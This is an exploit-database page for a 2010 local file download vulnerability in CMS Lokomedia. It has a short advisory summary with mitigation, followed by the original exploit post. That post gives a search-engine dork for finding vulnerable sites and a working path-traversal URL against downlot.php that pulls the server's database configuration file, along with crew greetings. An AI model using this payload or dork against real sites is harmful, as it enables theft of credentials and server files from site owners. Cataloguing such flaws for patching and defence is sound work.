header-logo
Suggest Exploit
vendor:
CMS Lokomedia
by:
Xr0b0t
7.5
CVSS
HIGH
LFD
22
CWE
Product Name: CMS Lokomedia
Affected Version From: all versions
Affected Version To: all versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

CMS Lokomedia Local File Download Vulnerability

A Local File Download (LFD) vulnerability exists in CMS Lokomedia, which allows an attacker to download any file from the server. This vulnerability is due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'downlot.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script with a specially crafted 'file' parameter. This will allow the attacker to download any file from the server.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, access to the vulnerable script should be restricted.
Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] CMS Lokomedia Local File Download Vulnerability
[~] Author : Xr0b0t (xrt.interpol@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://xrobot.mobi | http://mc-crew.net
[~] Date : 16 Mei, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://bukulokomedia.com/home
[+] Price : free
[+] Vulnerability : LFD
[+] Dork : inurl:"*.php?file=" ;)
[+] Version : all version 

[!]===========================================================================[!]

[ Vulnerable File ]
    http://127.0.0.1/path/downlot.php?file=[LFD]



[ XpL ]

    http://127.0.0.1/path/downlot.php?file=../config/koneksi.php

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] Don Tukulesto DUDUl Kok G rene2...
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212


[ NOTE ]

[+] OJOK JOTOS2an YO ..
[+] Minggir semua Arumbia Team Mau LEwat ;)
[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..
[+] Malang Cyber Crew & Magelang Cyber Community

Navigation

Suggest Exploit

Services By CQR